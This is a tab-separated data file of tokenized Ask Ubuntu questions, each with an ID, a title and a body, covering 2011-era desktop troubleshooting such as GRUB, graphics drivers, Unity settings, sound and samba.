68397	how to change the constrast on ubuntu with terminal or using a kde tool ?	i would like change the contrast and not only the brightness . my brightness can be ajusted in kde using my fn key , but i would like do it with the contrast too . some commands works like xbacklight -set 0 or xgamma -rgamma 0.1 , and derivative but no one change the contrast . is there a way to adjust the contrast using the terminal or any tool in kde ?
68405	dual boot windows8 and ubuntu10.10 using 2 separate hard drives ?	is it not possible to point grub2 at a windows8 install at this time ? i have win8 on the first hard drive and ubuntu10.10b64 on the second . i use the bios to switch os at boot time . i have tried a couple times to get them both in grub2 but for some reason had to reinstall win8 the first time and restore ubuntu the second time . no idea what happened to windows but i screwed up the syntax in grub2 the second time and could not edit anything with the cd . i 've seen different versions of the grub.d file to add the windows entry .
68406	how to delete a photo from appearance preferences 's list ?	i had some time ago a photo of a person as my desktop background image . now this photo remains in the list of photos in appearance preferences â background . is there a way to remove it , or reset those photos to show only the ubuntu original ones ?
68407	where do i place a logout script for lightdm ?	previously in karmic , we created a logout script that does some work in the background on backing up a users home directory , this script was put in the /etc/gdm/postsession directory . i ca n't figure out where to put a script that i want to run during a logout in lightdm . i 've searched and have found many people who are looking for this answer , so any help would be greatly appreciated .
68411	black screen on boot on a dell vostro 3555	loaded ubuntu 11.10 ( 64 bit ) onto brand new vostro 3555 ( amd a6 ) and wo n't boot ( black screen ) . tried nomodeset in grub.. still nothing . at a loss .
68412	how can i build an installer by tracking filesystem changes ?	ages ago i used to package software on windows using installshield adminstudio . i used it for building customized installers for company applications from existing app installers . i 'd like to do some of the same for some ubuntu systems and would like to know what options are available , if any . in a nutshell , here 's what i want to do : do something to set a breakpoint or other system snapshot location . install an application , customize some config files , maybe install a plugin or some data , icons , scripts , etc . tell the system that i 'm done making changes and have it build a tarball or dpkg based on the changes i 've made . are there any apps/packages that will do this , or anything that will at help with automating at least part of the process ?
68413	ca n't add email accounts to evolution	i have one email account set up with evolution which works . when i access email settings and get the evolution account assistant and try to `` add a new account '' the assistant closes . i can edit the existing account or remove it and replace it when opening evolution as an empty client , but i ca n't add a second account .
68416	how to set icon properties in kubuntu 11.10 launcher ?	i have some scripts : chrome-aoeu @ gmail.com chrome-ueoa @ netflix.com that open chrome with specific -- user-data-dir settings . when i drag the icons into launcher , the icon launches chrome , but it does so to a specific site ( the first one opens up gmail and the second one opens up netflix ) .
68417	is it normal for my memory usage to be 8gb ?	i just upgraded to 11.10 and while there are a few problems that seem like they might have gone away ( about 50 % of the time i could n't boot properly - have n't seen that happen yet ) , occasionally my computer slows to such a crawl as to be unusable . this seems to be at least somewhat related to chromium as killing tabs does make it get a bit better , but i have 8 gig ram ! sure i dedicate 4gb to a virtualbox vm , but the remaining 4 should be plenty . so keeping an eye on my system resources i see it pretty consistently looking like this : and this is with only 3 chrome tabs alive , chat , and nothing else really running . is this normal ? what steps do i take to trace down issues ? i 'm primarily a windows/web developer with at best a tenuous understanding of unix .
68418	how to add custom icon to kubuntu 11.10 launcher ?	i have a shell script , idea , that simply sets java_home then launches idea.sh . it does n't show in a dash home search so i ca n't use the drag-and-drop way of adding it to the launcher . how do i do this ?
68423	keyboard wo n't light up on a sony vaio vpcf121fx	i 've been using my vaio vpcf121fx for over a year now , running ubuntu 10.10 and then 11.04 and my backlight keyboard has always worked flawlessly . until now , i just install ubuntu 11.10 and this feature seems to be missing or forgotten by the developers . truth be told , i 'm a late-at-night kinda typer so this is something i do use a lot in my day-to-day ( or should i say nigth-to-night ) laptop environment . does anyone know how to fix it ?
68424	installing eclipse 3.6 and tomcat 7	i am a beginner with ubuntu . i 've read many questions , but i have n't been able to figure out how to install eclipse 3.6 and tomcat 7 on ubuntu 11.04 . i 've tried many answers posted but still no use . i want to install this software to do a jsp project . i would really appreciate the help .
68434	why does n't ubuntu have a strategy document ?	so why is xubuntu the only one that has a strategy document ? why is there not one for ubuntu , ubuntu server , kubuntu , etc.. ? does this mean that xubuntu is the only one thinking about these things ? xubuntu strategy document
68435	how to unlock screen in kubuntu 11.10 ?	after upgrading to kubuntu 11.10 , i 'm no longer able to unlock my screen . the screen stays blank . oddly , it seems i 'm able to logout of my current session by hitting ctrl-alt-delete enter . any advice ?
68443	how to add more workspaces in unity ?	how can i add rows/columns to my workspaces ? i would prefer a method which does n't involve ccsm .
68445	no battery status icon	i recently upgraded to 11.10 from 11.04 , everything went fine , still hate unity and all that . but my battery status is not showing up at all , even on my laptop . there is n't even any spaces for it , there is only the mail icon , wirelesss icon , sound , time , [ username ] and power . i have tried several different things to get it , but i am at a loss . please help i 've already tried to install indicator-power and it is installed .
68453	laptop touchpad is disabled after a while on an asus x59gl	i notice quite a few other questions on this subject , but so far none of them help me . i have a asus x59gl laptop that i upgraded from natty to oneiric and i 'm experiencing a new bug . my touchpad gets disabled while i use the computer , i.e . it does n't go to sleep or anything - i just find the touchpad does n't work anymore after an undetermined amount of time . i unticked the `` disable while typing '' option , but that did n't fix it . i ca n't find a `` touchpad : touchpad '' option in gconf , but somehow i do n't think that would help me , since the touchpad is very enabled until it gets disabled . i managed to get google to tell me about synclient , and just earlier i re-enabled the touchpad using synclient touchpadoff=0 from the terminal . but i 'd like not to do that . there 's no fn-key combo for disabling the touchpad and this only started happening after upgrading to oneiric . any ideas what disables the touchpad so i can go poke it with a stick ?
68460	how can i uninstall all the packages i 've installed today ?	i was trying to get musepack encoder support built into ffmpeg today , and i inadvertently broke a few things but i 'm not sure exactly which package i installed which broke them . how can i remove all packages i installed today , and start again from scratch more carefully ? i can see a list of them in `` ubuntu software center '' under today 's date in the `` history '' , but i do n't want to go through uninstalling them one-by-one , because there are hundreds to do .
68463	how to disable global < super > -p shortcut ?	in ubuntu 11.04 there was a workaround using gconf-editor and setting key /apps/gnome_settings_daemon/plugins/xrandr/active to false . however there is no such key in gconf-manager using ubuntu 11.10 ( gnome 3 ) .
68465	headphone not working in lubuntu 11.10	the problem was not resolved , but i went back to 11.04 1 . description of the problem the speaker works . when i plugin the headphone ( tried 2 types ) , both the speaker and the headphone mute . ============================================================== 2 . i found this . how can i try this on lubuntu ? `` all i needed to do was change the profile on the hardware tab of the sound setting screen from 'analog stereo duplex ' to 'analog stereo output ' . '' link ============================================================= 3 . already tried ( i ) [ hp pavilion dv6 , idt 92hd75b3 ] line out does not mute internal speakers did n't work . ( ii ) hdaintelsoundhowto $ cat /proc/asound/card0/codec* | grep codec codec : conexant cx20549 ( venice ) $ sudo gnome-open /usr/share/doc/alsa-base/driver/hd-audio-models.txt.gz gives me a file , but for conexant , there 're only conexant 5045 , conexant 5047 , conexant 5051 , conexant 5066 . ( iii ) [ bug 876020 ] re : [ 8932cto , conexant cx20549 ( venice ) , green headphone out , left ] no sound at all ( note : i needed rebooting . ) ( i ) now when i plug in the headphone , the sound comes out of both the speaker and the headphone . ( ii ) automute option in alsamixer is gone . ( iii ) i can not change the volume with fn+f10/f11 any more . ============================================================= 4 . more info $ sudo lshw -c sound 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 04 ) $ sudo lshw -c sound *-multimedia description : audio device product : 82801h ( ich8 family ) hd audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:45 memory : f0300000-f0303fff $ sudo leafpad /usr/share/pulseaudio/alsa-mixer/paths/analog-output-speaker.conf ; path for mixers that have a 'speaker ' control ; ; see analog-output.conf.common for an explanation on the directives [ general ] priority = 100 name = analog-output-speaker [ element hardware master ] switch = mute volume = merge override-map.1 = all override-map.2 = all-left , all-right [ element master ] switch = mute volume = merge override-map.1 = all override-map.2 = all-left , all-right [ element master front ] switch = mute volume = merge override-map.1 = all override-map.2 = front-left , front-right [ element master mono ] switch = off volume = off ; this profile path is intended to control the speaker , not the ; headphones . but it should not hurt if we leave the headphone jack ; enabled nonetheless . [ element headphone ] switch = mute volume = zero [ element headphone2 ] switch = mute volume = zero [ element speaker ] required = any switch = mute volume = merge override-map.1 = all override-map.2 = all-left , all-right [ element desktop speaker ] switch = off volume = off [ element front ] switch = mute volume = merge override-map.1 = all-front override-map.2 = front-left , front-right [ element rear ] switch = mute volume = merge override-map.1 = all-rear override-map.2 = rear-left , rear-right [ element surround ] switch = mute volume = merge override-map.1 = all-rear override-map.2 = rear-left , rear-right [ element side ] switch = mute volume = merge override-map.1 = all-side override-map.2 = side-left , side-right [ element center ] switch = mute volume = merge override-map.1 = all-center override-map.2 = all-center , all-center [ element lfe ] switch = mute volume = merge override-map.1 = lfe override-map.2 = lfe , lfe .include analog-output.conf.common
68466	how can i fix window title bars in unity ?	the problem i 'm having is that the window title bars do n't seem to update when i change windows or when they should be updating . for example , selecting a window randomly wo n't make the x/max/min buttons change to the focused/unfocused colors . also , operations such as changing tabs in gedit or firefox do n't change the window titles to reflect those changes . the window title bars do refresh if i do something such as resize the window or maximize and unmaximize it . moreover , this problem does not exist when the windows are maximized ( and hence the title is displayed on the global menu and not the window title bar ) . does anyone know how to fix it ? googling the problem suggests it may be a problem with the current version of emerald or fglrx but i 'm not sure how to fix either of these possible problems . any help is greatly appreciated , thanks !
68467	weird space on launcher after making a custom quicklist	after applying the settings in question how to add my favorite places as a quicklist in my home 's icon in unity ? , i get the unity launcher just ok , but when opening a nautilus windows , a blank icon appears . see screenshot , just under skype icon ... any advise ? thanks a lot !
68469	how can i change system wide mouse sensitivity for all users ?	using maverick 10.10 i was using an old usb optical microsoft wheel mouse . it died and i threw a spare on the system but it is way too fast and jerky . i can slow it down using the command xinput -- set-prop `` dell dell usb laser mouse '' `` device accel constant deceleration '' 5 and i suppose i could make a script to run at startup ( for every user ) , but the mouse is even crazy at the login screen . is there any way to slow it down permanently for all users and the login screen
68471	nvidia geforce gt 240 overscan problem	i am having issues getting the proper resolution on my 46 '' samsung tv . when in win7 i had to manually adjust the settings because the default nvidia 1920x1080 is outside of my monitor , i had to scale it to 1842x1036 to fit perfectly . ( using nvidia control panel ) when i install the driver in kubuntu i just cant get the driver to work properly . and the resolution it displays is outside of the borders of the screen and everything seems zoomed in . i am a super noob , so a super simple walkthrough response would be most welcome .
68472	is there a way i can block a folder from gnome and/or unity search ?	i sometimes browse erotic media files , and i have some of them stored in my hard drive . all said content is saved in one specific folder . is there a way i can block this folder from gnome and/or unity search ? i 've heard 'use a separate user ' , but that wo n't work , as the files will still be in my hdd , plus ; i often browse said files and work at the same time ( kinda ... lol ) . so , in short , i want to block ( blacklist ) a certain folder from dash . its bad enough that i do n't like gnome3 or the unity interface , i want to like gnome3 , but this little thing is really a big deal to me . hope i can get some help here . edit : i seem to have successfully blacklisted the folder i wanted to blacklist , and somehow managed to delete the ( previous to blacklisting ) `` recently used '' files . i 've entered so much crap into terminal , and installed so much stuff that i actually do n't know what the trick was . so , i plan on : formatting my machine ( as i always do when a new version is out ) reinstall ubuntu 11.10 i386 ( i own a 64bit machine , and 4gb of ram , but in my experience , software , like wine , has trouble working on 64bits , so , i 'll keep working with 3.8gb instead of 4 for now ) . install the gnome3 environment . find out exactly what it is that is needed to be done . update this very question with a full , appropriate answer . thanks to the next linked ( related ) q & a 's , that in some way helped me out ; and i have n't got a clue which one was the ultimate answer for ubuntu unity/gnome3 11.10 ( as some of this were answered for 11.04 , in which , i used ubuntu classic login ) : how can i keep recent files from appearing in unity ? how can i prevent certain directories/files from appearing in unity 's dash ?
68475	does ccsm work with gnome-shell ?	i recently upgraded my ubuntu 11.04 to 11.10 and now that gnome-shell is `` safe '' to install , i thought i 'd give it another go . after a small driver issue , gnome-shell is working great ! i am a big fan of the compiz `` grid '' plugin - specifically the alt+ctrl+kp_* bindings . according to ccsm , they are set , but they do not work . dragging windows to the sides work , but the keyboard shortcuts do not . then i realised that none of the changes i make via ccsm are taking effect ! does this mean gnome-shell does not work with ccsm or is this just something wrong with my system ? any ideas on how i can make this work again ?
68476	how do i select a different theme for both gnome and unity ?	i want ambiance to be the theme when i choose ubuntu , and adiwwata to be the theme when i go into gnome . i think it was like that after a clean install , but not anymore . cant it be done ...
68478	how to restore session menu to unity panel ?	for reason ( s ) yet unknown , the session indicator has disappeared from my unity panel ( ver . 11.10 . ) short of reinstalling , is there a way the session indicator can be restored , perhaps through a command issued to gsettings ? ( i 'm new to ubuntu and still learning . ) any thoughts would be greatly appreciated .
68488	how do i install pencil ?	pencil either runs as a firefox extension or as a standalone application with xulrunner 1.9.2 . trying to install xulrunner : rich @ rich-laptop : ~/apps/pencil $ sudo apt-get install xulrunner-1.9.2 [ sudo ] password for rich : reading package lists ... done building dependency tree reading state information ... done package xulrunner-1.9.2 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'xulrunner-1.9.2 ' has no installation candidate so i tried to install it using firefox by clicking on the install button on the pencil home page , and the .xpi file was downloaded and opened by an archive manager . any ideas ?
68491	how to add rhythmbox controls to the sound menu ?	i recently installed a fresh install of ubuntu 11.10 64-bit on my notebook . i personally prefer rhythmbox over banshee so i searched for and installed it from the ubuntu software center . ( including all plugins that were listed ) . unlike previous versions of ubuntu ( 11.04 , 10.10 , etc.. ) the ( previous , play/pause , next ) controls have been removed from the sound menu . rhythmbox is still listed ( above `` sound settings ... '' ) but when clicked all it does is open the application . to add insult to injury the banshee controls are displayed right above it - even though that application is n't running . i have tried opening rhythmbox from the unity dashboard , the unity launcher , and the sound menu with the same results . i 've also verified that i had rhythmbox-plugins installed . i even tried to remove and install the application . still no controls . it looks like they were removed and that we are now expected to use banshee . why ? here is a screenshot of what my sound menu looks like when i 'm playing a file in rhythmbox . ( notice that banshee is n't running but it 's controls are displayed ) in ubuntu 10.10 and 11.04 rhythmbox had controls just like banshee 's controls in the screenshot .
68494	how do i prevent msi u100 netbook from freezing upon resume from suspend ?	fresh install of oneiric on u100 . previously had mint 9 on it , which slept and resumed properly . under 11.10 suspend leads to very unpredictable results . sometimes i can type my password and get back the display . sometimes it will freeze and not let me wake it up with the keyboard or mouse . sometimes it will come back , but not let me do anything . in all cases after suspend , wireless wo n't work .
68495	can a gnome2 like interface be built upon the new gnome3 code ?	as far as i understand , both unity and the new gnome shell are both running on new gnome code base . there 's some name confusion because talking about gnome seems to refer to both the code underneath and the shell . just to be clear , i 'll use gnome3-code and gnome3-shell to separate out the code from the ui . now , if i have that straight , the new gnome3-code is a serious improvement over the old gnome2-code . i can actually tell that it is significantly more responsive and i presume more stable and rational . so that 's good . and , if i 'm right about all this , unity and gnome-desktop are both just shells on top of the new gnome3-code . it 's on the shell layer that ( questionable ) decisions , like having a `` launcher '' that can only be on the left side , are made . so my question is this : would it not be possible to use the new gnome3-code and make a new shell that is basically the same ui as the gnome2-shell ? are n't all the ui level decisions essentially arbitrary ? is there some reason why you could n't have panels and compiz effects and all that jazz ? i notice that gnome3-shell is not compatible with compiz , but unity is . so , surely it would be possible to make a shell that recreated gnome2-shell . of course , i have absolutely no coding expertise in this area whatsoever . but is there a place or a way i can plant the seed of suggesting that someone fork a gnome2-shell for gnome3-code ? from what i have seen , while gnome3-shell and unity have their supports , it seems to me the base of that support comes mainly from people close to the project , and the dislike for unity and gnome3-shell is pretty significant . i bet if someone went in the direction of a new gnome2-like-shell , it would soon become a de-facto standard .
68497	ca n't install on a compaq v3000 becouse of nouveau/nvidia	the monitor is not well recognized and i ca n't configure the nvidia drivers because , during install , nouveau is installed and used as kernerl modules . so , i ca n't get xorg to work in desktop live cd and so , i ca n't install ubuntu . is there a form to disable nouveau in grub or something similar ? ?
68499	remove epiphany 3.2 after installing it from a ppa ?	i installed epiphany 3.2 via ppa at webupd8.org to check out the webapp feature . tried it but its not for me . i removed the ppa in the software sources , and did remove -- purge , but it is still there and installed . even after a log out . how can i remove epiphany 3.2 from ubuntu ( 11.10 ) .
68502	how can i remove the `` dash home '' icon from the unity launcher ?	my notebook has a widescreen display so vertical space is an absolute premium for me . when i installed ubuntu 11.10 i was disappointed to see that a new icon confusingly named `` dash home '' had been added to the very top of the unity launcher . i ca n't move it to the bottom ( by dragging it ) and it does n't have a context menu with which to remove it ( by unchecking `` keep in launcher '' ) . it 's horrible . how can i remove it from the unity launcher and reclaim the space that was taken from me ? ( i realize that if it 's removed i 'll have to open the dashboard with the super key - i 'm fine with that )
68507	problems with using themes in geany	i 'm trying to switch to the geany editor for my web development but need to switch to a dark theme . in searching for some default themes i came across this excellent collection . i 've now installed the themes and they appear when i go to view - > editor - > color and i can select one . however , selecting a theme does nothing . i am running geany 0.20 ( the latest version on ubuntu 11.10 ) and have tried installing the new version and the deprecated version of the themes but get the same from both .
68508	why does n't the unity-2d dashboard remain fullscreen after i click the fullscreen button ?	my notebook has a widescreen display of 1280x800 and for some reason the unity-2d dashboard always insists on opening up using only about 60 % of my screen . at the bottom right of the dashboard is an icon . when i click this icon the dashboard expands to full screen . great ! it looks good and does n't feel so cramped on my display.. however when i close the dashboard and re-open it again ( to find a file or program ) it always reverts back to non-fullscreen . i have to open the dashboard and and constantly click that fullscreen button in the bottom right - it 's really annoying . once i 've indicated my preference should n't the dashboard remember what that preference was ? that 's how the dashboard 's `` filter results '' works - if i expand it and re-open the dashboard it stays expanded . why are these two behaviors not consistent ? if i 'm not suppose to make the dashboard full screen then why even include the button to expand it to full screen if it ' only going to revert back ?
68519	how to know the name of the systray applications in order to add it one by one on the systray-whitelist ?	using the systray-whitelist [ 'all ' ] i got two battery indicators ! ! ! how to know the name of the systray applications in order to add it one by one on the systray-whitelist ?
68525	empathy incosistent notifications	im having a really annoying problem with empathy . the new chat notification are visible enough on the top unity bar but further non-focused chat notification are not visible . the audible notifications are coming and left unity launcher has the subtle highlights but not the top bar . using fresh 11.10 install . the option to display notification is also checked but the bubble notification is turned off
68526	how to install gnome 3 on ubuntu server ?	i have installed ubuntu server 64-bit and i want to install gnome 3 or kde . what dependencies must be installed ? please specify all steps .
68528	follow a .lnk with samba	i 'm trying to access some file on my company 's local network . the file i was looking for appears to be a windows shortcut ( .lnk ) and , of course , i ca n't follow it from my ubuntu . i did n't find any option with smbclient to be able to access what 's behind the link . does anyone have an idea on how to get there ? i do n't need samba to follow the link , i just need to know where it goes , so i can access the file directly .
68530	how do i get three monitors working on an nvidia gtx 590 ?	some weeks ago i bought the latest and greatest graphic card from nvidia ( gtx 590 ) i previous used amd 6950 that supported my 3 monitors perfectly . i tried to install the gtx 590 with ubuntu 11.04 but had some issues with the default graphic driver . instead of spending hours of investigation i decided to wait for the release of ubuntu 11.10 with an hope that my gtx 590 multi monitor setup was supported nativly . after 5 days with problem shooting i still donât have my three monitors up and running . i 'm able to configure twin-view with 2 monitors but not able to `` hock on '' the third monitor . are there anyone that has successfully configured ubuntu 11.10 with a gtx 590 and a 3 monitor setup ? or do i need to go back to my amd 6950 card and see that i have spent âł 500 on something that 's not working for me ? i have tried to use the additional drivers ( post release drivers ) that can be installed in ubuntu . i have not yet tried the latest drivers from nvidia.com on 11.10 ( tried this for 11.04 without success ) thanks in advance ! !
68531	no logout/power-off option in unity 's power cog menu	after upgrade to ubuntu 11.10 , i do n't have a logout/power-off option in the upper right menu . is there a way to add it ?
68536	how can i disable lock on resume in 11.10 ?	since my upgrade to oneiric i have n't been able to figure out how to re-disable locking the computer after resuming . ordinarily i could use gconf-editor to tell the system but that does n't work now . how can i bring back that functionality ?
68540	is there any image application that can cut part of an image and is faster/ligther than gimp ?	from screenshot i want to cut only part that is important . i do know i can do it using gimp , but gimp is very slow too start . is there any default image application that can do it faster ?
68543	touchscreen does n't work on emachines ez1711	after updating from 11.04 to 11.10 touchscreen on emachines ez 1711 does n't work . mouse1 device disappeared .
68547	editing the default boot item in grub menu , a definitive answer ?	each time i 've tried to dual boot ubuntu with windows i always have difficulty with the same thing ... editing the default option on the grub boot loader . i 'm now running 11.10 and have run into the same problem . startup-manager did n't work on 11.04 , neither does it work on 11.10 . editing grub_default= in the /etc/default/grub file does n't seem to work either . this should n't be difficult , and i 'm sure there 's a simple explanation . could someone please tell me what it is ?
68548	how do i start b43 drivers on bootup ?	so i followed instructions a tad late to get my wireless setup going . i use the b43 drivers . the problem is that if i restart the computer , it wo n't activate until i launch the terminal and use the `` modprobe b43 '' command . anyway that i can get it to start so i wo n't need to use it ?
68553	how do i disable nautilus desktop ?	i am using nautilus on xfce and oneiric , but the desktop of nautilus shows up although i have activated it via gconf , e.g . by gconftool-2 \ -- type bool \ -- set /apps/nautilus/preferences/show_desktop false i remember this had worked on previous versions of ubuntu .
68555	lubuntu does n't detect correct cpu frequency	when i was using ubuntu setting performance in /sys/devices/system/cpu/cpux/cpufreq/scaling_governor set cpu frequency at 2.4ghz and setting powersave the frequency was 800mhz . but now i 'm using lubuntu ( in this last version of ubuntu it 's too difficult to get a normal desktop like gnome2 , and i prefer lxde than gnome3 or unity ) and the frequency ( in performance ) is set at 1.2ghz and in powersave is 150mhz . i have a laptop and an intel t7700 that is a core2duo at 2.4ghz any idea ? here you can see the result of ~ $ cpufreq-info cpufrequtils 007 : cpufreq-info ( c ) dominik brodowski 2004-2009 report errors and bugs to cpufreq @ vger.kernel.org , please . analyzing cpu 0 : driver : p4-clockmod cpus which run at the same hardware frequency : 0 cpus which need to have their frequency coordinated by software : 0 maximum transition latency : 10.00 ms. hardware limits : 150 mhz - 1.20 ghz available frequency steps : 150 mhz , 300 mhz , 450 mhz , 600 mhz , 750 mhz , 900 mhz , 1.05 ghz , 1.20 ghz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 1.20 ghz and 1.20 ghz . the governor `` performance '' may decide which speed to use within this range . current cpu frequency is 1.20 ghz ( asserted by call to hardware ) . cpufreq stats : 150 mhz:12,55 % , 300 mhz:0,00 % , 450 mhz:0,00 % , 600 mhz:0,00 % , 750 mhz:0,00 % , 900 mhz:0,05 % , 1.05 ghz:0,00 % , 1.20 ghz:87,40 % ( 52 ) analyzing cpu 1 : driver : p4-clockmod cpus which run at the same hardware frequency : 1 cpus which need to have their frequency coordinated by software : 1 maximum transition latency : 10.00 ms. hardware limits : 150 mhz - 1.20 ghz available frequency steps : 150 mhz , 300 mhz , 450 mhz , 600 mhz , 750 mhz , 900 mhz , 1.05 ghz , 1.20 ghz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 1.20 ghz and 1.20 ghz . the governor `` performance '' may decide which speed to use within this range . current cpu frequency is 1.20 ghz ( asserted by call to hardware ) . cpufreq stats : 150 mhz:6,26 % , 300 mhz:0,00 % , 450 mhz:0,00 % , 600 mhz:0,00 % , 750 mhz:0,00 % , 900 mhz:0,05 % , 1.05 ghz:0,00 % , 1.20 ghz:93,69 % ( 36 ) i have started the livecd of ubuntu and it allows these frequencies : ubuntu @ ubuntu : ~ $ sudo cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies 2401000 2400000 2000000 1600000 1200000 800000 and when i start lubuntu i can see this error : * starting save kernel messages [ 74g [ ok ] fatal : error inserting e_powersaver ( /lib/modules/3.0.0-12-generic/kernel/drivers/cpufreq/e_powersaver.ko ) : no such device fatal : error inserting acpi_cpufreq ( /lib/modules/3.0.0-12-generic/kernel/drivers/cpufreq/acpi-cpufreq.ko ) : device or resource busy * stopping save kernel messages [ 74g [ ok ] fatal : error inserting pcc_cpufreq ( /lib/modules/3.0.0-12-generic/kernel/drivers/cpufreq/pcc-cpufreq.ko ) : no such device * stopping anac ( h ) ronistic cron [ 74g [ ok ]
68557	how do i get a broadcom bcm 4311 working ?	i have an hp nx6310 equipped with wifi card broadcom bcm 4311 . it was perfectly working on ubuntu 11.04 with sta driver , then i made a fresh install of ubuntu 11.10 and it stops working . after trying lot of solutions the only working for me has been the one found in this site . so i put the following commands in a terminal : sudo apt-get update sudo apt-get install firmware-b43-installer sudo apt-get remove bcmwl-kernel-source sudo reboot and now wifi is working !
68560	why does checking for updates take so long and use so much data ?	i have just installed ubuntu 11.10 and checked for updates - it took about 15mb ( very rough estimate ) and 15min ( on a uncapped adsl line approx 30kb/s ) just to see that i should download 7mb of updates . this is not something new , same thing when i add a ppa to install a tiny program - i have to wait 15-20 min just to install it . and i have an uncapped internet connection , what about users that does n't have uncapped internet ? why is it that everything else on ubuntu is moving forward , this critical part is not progressing ? the new software centre is great , but it is driving me insane that it is taking so long . also the updating cache messages are misleading - it says downloading 2 of 3 files , then 4 of 6 files , eventually 80 of 113 files - it feels like my computer is lying to me , and i have no idea how long it is going to take to check for the updates ! ! !
68563	how can i log shutdown console text ?	in oneiric shutdown is a lot slower than in previous releases and when i look at the console text while shutting down there seems to be a problem with the network manager . now i wanted to know how i log the text being shown during shutdown .
68568	gnome-tweak-tool fails with error gtweak not found	i 'm trying to run gnome-tweak-tool but it gives the following error : igor @ burninhell : ~ $ python /usr/bin/gnome-tweak-tool~ traceback ( most recent call last ) : file `` /usr/bin/gnome-tweak-tool~ '' , line 25 , in import gtweak importerror : no module named gtweak where can i find the gtweak lib ? thanks , igor
68569	how can number of workspace be set used unity in ubuntu 11.10 ?	how can number of workspace be set used unity in ubuntu 11.10 ? unfortunately , i could not find any solution for it : ( .
68570	unable to see shared folders in samba	i am trying to create a shared folder . installed samba ( as i have done on plenty of occasions for other releases ) create the shared folder , all the appropriate privileges , etc , all with no problem . however , i can not see the shared folder on any other pc on my local network . the other pc 's are ubuntu 10.10 and a winxp . is there a hidden file i have to alter ? i have checked the samba config and that seems all ok . i do rely on a gui , but i have a little terminal knowledge and checked what i can . the strange thing is that the ubuntu 11.10 pc can see a storage server running ubuntu 10.04 , but can not see a shared folder on a pc running 10.10 . i am using ubuntu 11.10 64bit , is 32bit less buggy ? thanks
68571	how do i get the bleeding edge chromium ?	the following versions of chromium are available at the moment : chromium stable ppa ( 13.0.782.218 ) chromium beta ppa ( 14.0.835.126 ) ubuntu repo ( 14.0.835.202 ) chromium dev ppa ( 15.0.865.0 ) chromium daily ppa ( 15.0.871.0 ) all packages for ubuntu oneiric ocelot . however , as per chromium developer calendar , the following versions are released for linux : linux dev 16.0.904.0 linux beta 15.0.874.92 linux stable 14.0.835.202 is there any way i can get the latest developer build running on my system ( without compiling it )
68573	downgrade firefox 7 to ff6	system : ubuntu 10.04 for testing purposes i need to downgrade from ff7 to ff6 . i 'm aware of this answer : how to downgrade to firefox 4 on 11.04 but my synaptic package manager only offers me 7.01 , 3.6.3 and 3.6.23 when i go to `` force version '' . how is this best achieved ?
68576	how does one upgrade redis 2.2 to 2.4 ?	redis 2.4 was recently released and i 'm interested in upgrading my current redis install which is version 2.2 . do i just need to download and compile it like i did 2.2 or do i delete 2.2 first then install 2.4 ? linux commands would be appreciated or even a guide on how to generally upgrade linux programs not using apt . thanks ! !
68578	ubuntu 11.10 lock screen	i really like the new login screen that comes with 11.10 , and was disappointed that the lock screen did not look similar . the current lock screen looks pretty underwhelming in comparison . i searched this site for a few suggestions on how to make it look a bit better , but they seem to all point to previous versions of gnome ( v2 ) , an example is how to make the lock screen look like the login screen ? does anyone know how i can change the theme of the lock screen ?
68587	rabbit vcs stopped working after upgrade to 11.10	been using rabbitvcs for months now happily . then when i updated to oneric on monday rabbit vcs stopped working . it is installed but the right click menu in nautilus is gone and unintsalling/reinstalling does nothing . it sees to be available from the command line but the gui seems to have vanished .
68589	do you wait for a release upgrade to stabilise before going ahead with it ?	i 'm new to ubuntu/debian being a gentoo user for many years , so please excuse my ignorance . i 've just been informed of the release of 12.04 but when i review the package list i noticed an inconsistency . the groovy language and groovy-doc is no longer supported by canonical and will be removed . however groovy-doc will also be upgraded . i only realise this because it 's something of interest to me so i would n't have any idea about all the other areas of the system i do n't know anything about . i feel i should wait some time for the release to have some problems ironed out before i continue with the upgrade . is that a advised practice ?
68595	ca n't use two screens with an nvidia 9600gt	in an effort to learn more about ubuntu , i downloaded and installed 11.10 onto my old workstation at home . we have a second workstation that runs windows 7 too . both workstations are plugged into both monitors . the win7 one uses dvi into a hp la2405wg 24inch monitor and dvi into a hp lp2065 20inch monitor . the ubuntu one uses dvi into the lp2065 and displayport into the la2405wg via a nvidia 9600gt with 1024mb ( let me know if you need further into ) . looking in the displays application , it only detects one screen the lp2065 but appears as `` unknown '' . in the nvidia x server settings application , it detects both monitors ( see below ) , but for the la2405 it says connection link disabled ( see below -- might need to click it to see full screenshot ) . how can i enable the connection link ? i 've tried removing all nvidia drivers and reinstalling xorg ( as described here ) . before i reinstalled the nvidia drivers , the displays application correctly identified both monitors . but would n't actually turn the la2405 one on ( it kept flickering to screen going to sleep message and then turning on again in a loop ) . installing the nvidia drivers , returned me to the state i started in ( as described above ) . a solution is greatly needed !
68599	how can i set that alt-tab to switch windows only on the current workspace ?	how can i set alt-tab shortcut to switch only between current workspace windows ( not all windows on all workspaces ) used unity in 11.10 ? i set a plugin for it in compiz manager , but it could not solve my problem . thx !
68612	how to change the dash icon in the unity launcher ?	i do n't like the dash icon in the unity launcher , it 's pretty inconsistent with the faenza icon theme and i would like to change it . how can i do that ?
68614	setup_exception_record error when running wine application	i am using wine 1.3.28 and when i run leagueoflegends.exe i am getting this antonis @ antonis-desktop : ~/downloads $ wine leagueoflegends.exe err : seh : setup_exception_record stack overflow 1696 bytes in thread 0009 eip 7ef6dc3b esp 00ab0c90 stack 0xab0000-0xab1000-0xcb0000 segmentation fault can anyone tell me what this means ? thank you for your time
68616	i installed sni-qt and there is no indicator for skype . how do i fix this ?	i upgraded from 11.04 to 11.10 , installed sni-qt , and still have no skype indicator . what do i do ?
68624	unable to login after changing 'root ' name in /etc/passwd	i have ubuntu server on aws ( amazon web services ) ec2 . i access it remotely through putty service on my windows . unfortunately i have changed the username 'root ' to some other editing the file /etc/passwd . now i am unable to login through any user name . if i give username as 'root ' or other it does not accept it but if i give it new username , it ask for the password , saying [ authenticating with public key `` imported-openssh-key '' ] , on giving password it gives alert `` authentication failed . '' anyone ! please help me to solve this problem . thanks in advance
